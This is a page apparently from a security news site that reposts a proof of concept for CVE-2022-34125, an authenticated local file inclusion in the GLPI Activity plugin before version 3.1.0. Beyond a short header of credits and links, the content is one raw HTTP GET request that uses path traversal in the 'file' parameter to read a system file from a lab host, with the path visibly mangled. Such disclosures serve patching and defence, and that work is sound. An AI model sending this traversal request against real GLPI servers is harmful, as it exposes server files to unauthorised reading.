Home Tools Exploits & CVE's GLPI Activity Local File Inclusion

GLPI Activity Local File Inclusion

April 5, 2023

305

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

advisories | CVE-2022-34125

# Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125

# PoC
GET /marketplace/activity/front/cra.send.php?&file=../../..............WindowsSystem32driversetchosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GLPI Activity Local File Inclusion

Follow us on Instagram @thecyberpost

EDITOR PICKS

Microsoft PlayReady Toolkit

Systemd Insecure PTY Handling

Russian Operator of BTC-e Crypto Exchange Pleads Guilty to Money Laundering

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

BoidCMS 2.0.0 Command Injection

Backdoor.Win32.Antilam.13.a Code Execution

Hasura GraphQL 1.3.3 Remote Code Execution